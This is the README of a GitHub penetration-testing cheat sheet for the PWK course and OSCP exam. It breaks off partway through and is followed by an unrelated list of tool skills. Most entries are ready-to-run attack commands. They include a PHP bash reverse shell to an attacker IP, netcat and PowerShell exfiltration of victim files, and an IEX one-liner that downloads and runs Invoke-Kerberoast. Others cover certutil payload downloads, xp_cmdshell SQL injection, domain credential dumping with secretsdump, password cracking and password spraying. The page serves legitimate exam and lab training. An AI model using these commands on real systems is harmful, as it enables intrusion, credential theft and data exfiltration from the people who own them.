JustTryHarder
JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings)
Install / Use
/learn @sinfulz/JustTryHarderREADME
JustTryHarder
JustTryHarder is a cheat sheet which will aid you through the PWK course & the OSCP Exam.
(Inspired by PayloadAllTheThings)
Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖
Hacktoberfest friendly! Yes, we are open to Pull Requests for Hacktoberfest! Please ensure it is not spam and actually contributes well to this repo. Thanks & happy hacking!
Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.
Credit Info
I have obtained a lot of this info through other Github repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible. If I have not given you credit, please contact me on Twitter: https://twitter.com/s1nfulz
Table of Contents
- Determining the OS of a host via Ping
- BOF (WIP)
- Breakouts / Environment Escapes
- DNS - Zone Transfers
- File Transfers
- Kerberoasting
- LFI / RFI
- MSSQL / SQLi
- Password Cracking
- Password Spraying (CrackMapExec)
- Payload Generation
- PHP
- Priv Esc - Linux
- Priv Esc - Windows
- Post Exploitation
- Port Forwarding
- Socks Proxy (using PowerShell)
- Port Scanning
- Ping Sweep
- Pivoting
- Remote Desktop
- Responder
- Reverse Shells
- Shell Upgrading
- SQL Injection (SQLmap)
- Show listening ports
- SMB - Enumeration
- SMB - Impacket
- SMTP Enumeration
- ICMP Injection
- VMware (not going full screen)
- Web Servers
- Web Scanning
- Web Shells
- WordPress
- Windows Framework / Powershell
- Windows Post Exploitation Commands
- Writeable Directories
- Todo List
- Thank you
Determining the OS of a host via Ping
ping 10.10.10.110
PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
The TTL can be used to determine the OS of the host. The three different types of TTL are as shown below:
- TTL=64 = *nix - The hop count; so if you are getting 61, then there are 3 hops and it is a *nix device. Most likely Linux.
- TTL=128 = Windows - Again, if the TTL is 127 then the hop is 1 and it is a Windows box.
- TTL=254 = Solaris/AIX - If the TTL is 250 then the hop count is 4 and it is a Solaris box.
BOF (WIP)
(Typical bad characters include: 0x00, 0x0A, 0x0D)
- Fuzzing
- Finding EIP position
- Finding bad chars
- Locating
jmp esp - Generating payload with
msfvenom - Getting reverse shell with
netcat
Good BOF resources:
- NCC Group - Writing Exploits for Win32
- Corelan - Exploit Writing Tutorial Part 1
- GitHub - dostackbufferoverflowgood
- VeteranSec - 32-bit Windows Buffer Overflows Made Easy
Breakouts / Environment Escapes
- Pentest Partners - Breaking out of Citrix
- SRA.io - SiteKiosk Breakout
- TrustedSec - Kiosk/POS Breakout Keys
- Cognosec - Breaking out of Citrix Environment
- NetSPI - Breaking out of Applications
- NCC Group - Common Issues with Environment Breakouts (PDF)
- GracefulSecurity - Citrix Breakout
DNS - Zone Transfers
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
File Transfers
SMB Transfer
On the Victim machine (Windows):
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
Wget Transfer
How to retrieve file(s) from host (inside a reverse shell).
Setup: Place file you want transferred in /var/www/html/ and run service apache2 start.
Run on the remote server:
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64) # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/) # <- for folder
TFTP Transfer
(How to transfer from Kali to Windows).
Using MSF: Start MSF before these steps:
use auxiliary/server/tftpset TFTPROOT /usr/share/mimikatz/Win32/run
Inside a terminal:
4. tftp -i 10.10.10.10 GET mimikatz.exe
NetCat (Windows to Kali)
- Windows:
nc -nv 10.11.0.61 4444 < bank-account.zip - Linux:
nc -nlvp 4444 > bank-account.zip
PowerShell
Interactive session:
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
Without an interactive PowerShell session (Create wget.ps1):
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
Base64 (Linux -> Linux)
Local Host:
$(echo "cat /path/to/exploit.py | base64") > encoded.b64- Transfer
encoded.b64to the remote server viancor otherwise.
Remote Server - Linux:
3. cat /path/to/encoded.b64 | base64 -d > exploit.py
Certutil
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
HTTP File Upload (Exfiltration)
1. Create upload.php
Create in attacking machine webroot (/var/www/html by default).
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
2. Create directory Create upload directory and set appropriate permissions to allow upload.
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
3. Upload file Upload file from victim machine to attacking machine using PowerShell:
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
Kerberoasting
GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcatimpacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes
LFI / RFI
PHP Reverse Shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
Command Injection:
<?php echo shell_exec(whoami);?>
MSSQL / SQLi
EXEC master..xp_cmdshell 'whoami';' exec master..xp_cmdshell 'whoami' --- OSCP-2 SQL Injection Cheatsheet
- PentestMonkey SQL Injection
Password Cracking
Hashcat
hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt
John The Ripper
john --rules --wordlist=/path/to/your/wordlist.txt hash.txt
Password Spraying (CrackMapExec)
cme smb 10.10.10.10 -u username -d domain -p password
Payload Generation
Types:
- Non-staged:
netcat - Staged:
multi/handler
PHP
Priv Esc - Linux
Note: If GCC & wget are installed, the system MIGHT be vulnerable to a kernel exploit.
- Linux Kernel Exploits
- GTFObins - Break out of restricted shells
- GTFO Helper script: https://github.com/dreadnaughtsec/gtfo
- Linux Exploit Suggester
- [Linux Exploit Suggester 2](https:
Related Skills
gh-issues
352.5kFetch GitHub issues, spawn sub-agents to implement fixes and open PRs, then monitor and address PR review comments. Usage: /gh-issues [owner/repo] [--label bug] [--limit 5] [--milestone v1.0] [--assignee @me] [--fork user/repo] [--watch] [--interval 5] [--reviews-only] [--cron] [--dry-run] [--model glm-5] [--notify-channel -1002381931352]
node-connect
352.5kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
111.3kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
Writing Hookify Rules
111.3kThis skill should be used when the user asks to "create a hookify rule", "write a hook rule", "configure hookify", "add a hookify rule", or needs guidance on hookify rule syntax and patterns.
